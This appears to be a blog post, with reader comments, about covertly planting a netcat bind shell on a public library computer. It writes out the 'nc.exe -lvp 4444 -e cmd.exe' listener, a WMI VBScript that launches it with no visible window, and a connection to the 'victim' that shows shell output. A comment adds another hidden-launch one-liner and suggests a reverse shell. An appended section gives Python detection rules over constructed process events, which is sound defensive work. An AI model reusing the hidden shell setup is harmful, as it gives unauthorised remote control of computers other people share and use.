So I did this while I was at a library, since it does not need admin rights and I did not need to sit at the computer. I set up a netcat listener on port 4444 so I could connect to the computer from anywhere in the building. First I got a VBScript straight from Microsoft so that you do not see the listener running; to create a hidden process in Windows I used the script I found here.
Next I downloaded netcat for Windows and created a batch script to run the command I wanted:
C:\Users\Syrus\Documents\nc\nc.exe -lvp 4444 -e cmd.exe
Next I edited the VBS script to include the batch file I made:
' Value this script uses for ShowWindow so the new process gets no visible window
Const HIDDEN_WINDOW = 12
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
' Startup configuration that hides the window of the process being created
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
' Launch the batch file through WMI with that startup configuration
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:\Users\Syrus\Documents\test.bat", null, objConfig, intProcessID)
So this pipes cmd.exe to a listener on port 4444; all I need to do is find the IP of the victim and use netcat to connect. I did this by running:
$ nc -vn 10.10.9.171 4444
Connection to 10.10.9.171 4444 port [tcp/*] succeeded!
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Now I have access to the computer from pretty much anywhere in the building. Have fun!
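From the defender's side, the chain above (script host, WMI-created process, netcat listener handing out cmd.exe) leaves a recognisable trail in process-creation telemetry. The following is an added example, not code from the original post: detection rules run over constructed Sysmon-style ProcessCreate events, where the paths, PIDs and the WmiPrvSE.exe parent are assumptions for the sample.

```python
import re

# Constructed Sysmon-style ProcessCreate (Event ID 1) records for this example,
# not real logs; paths, PIDs and the WmiPrvSE.exe parent are assumed.
SAMPLE_EVENTS = [
    {"ProcessId": 1200, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\Syrus\Documents\hidden.vbs"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessId": 1304, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Users\Syrus\Documents\test.bat"',
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"ProcessId": 1320, "Image": r"C:\Users\Syrus\Documents\nc\nc.exe",
     "CommandLine": r"C:\Users\Syrus\Documents\nc\nc.exe -lvp 4444 -e cmd.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"ProcessId": 1400, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": r'"C:\Program Files\Mozilla Firefox\firefox.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# netcat-style "-e <shell>" hand-off combined with a listen flag (-l, -lvp, ...)
SHELL_HANDOFF = re.compile(r"(?:^|\s)-[a-z]*e\s+(?:cmd|powershell)(?:\.exe)?\b", re.I)
LISTEN_FLAG = re.compile(r"(?:^|\s)-[a-z]*l[a-z]*\b", re.I)
USER_PROFILE = re.compile(r"[a-z]:\\users\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the list of reasons this process-creation event is suspicious."""
    reasons = []
    cmd = ev["CommandLine"]
    if SHELL_HANDOFF.search(cmd) and LISTEN_FLAG.search(cmd):
        reasons.append("listener handing a shell to the network")
    if basename(ev["ParentImage"]) == "wmiprvse.exe" and USER_PROFILE.search(cmd):
        reasons.append("spawned via WMI Win32_Process.Create from a user-profile path")
    if basename(ev["Image"]) in SCRIPT_HOSTS and USER_PROFILE.search(cmd):
        reasons.append("script host running a script from the user profile")
    if USER_PROFILE.match(ev["Image"]):
        reasons.append("executable located in the user profile")
    return reasons

def detect(events):
    """Map ProcessId -> reasons for every event that triggers at least one rule."""
    return {ev["ProcessId"]: r for ev in events if (r := classify(ev))}

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, "; ".join(reasons))
```

Each rule on its own is a weak signal (users do run scripts from their profile); the listener-with-shell rule and the WMI-parent rule are the ones worth alerting on, and the others are context for the chain.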
4 comments:
Thanks for sharing...
But we can also do this by running the desired batch program from the shell:
set shell = CreateObject("Wscript.Shell")
shell.run "C:\system32\nc -lvp 4444 -e cmd.exe",0
It would be better if we could do a reverse shell to the attacker, because usually all computers nowadays are behind a NAT.
Thanks for sharing all this information with us.
Great, thanks
Very useful information...
Thanks a lot.
Regards, Prince Kumar
www.codetracker.us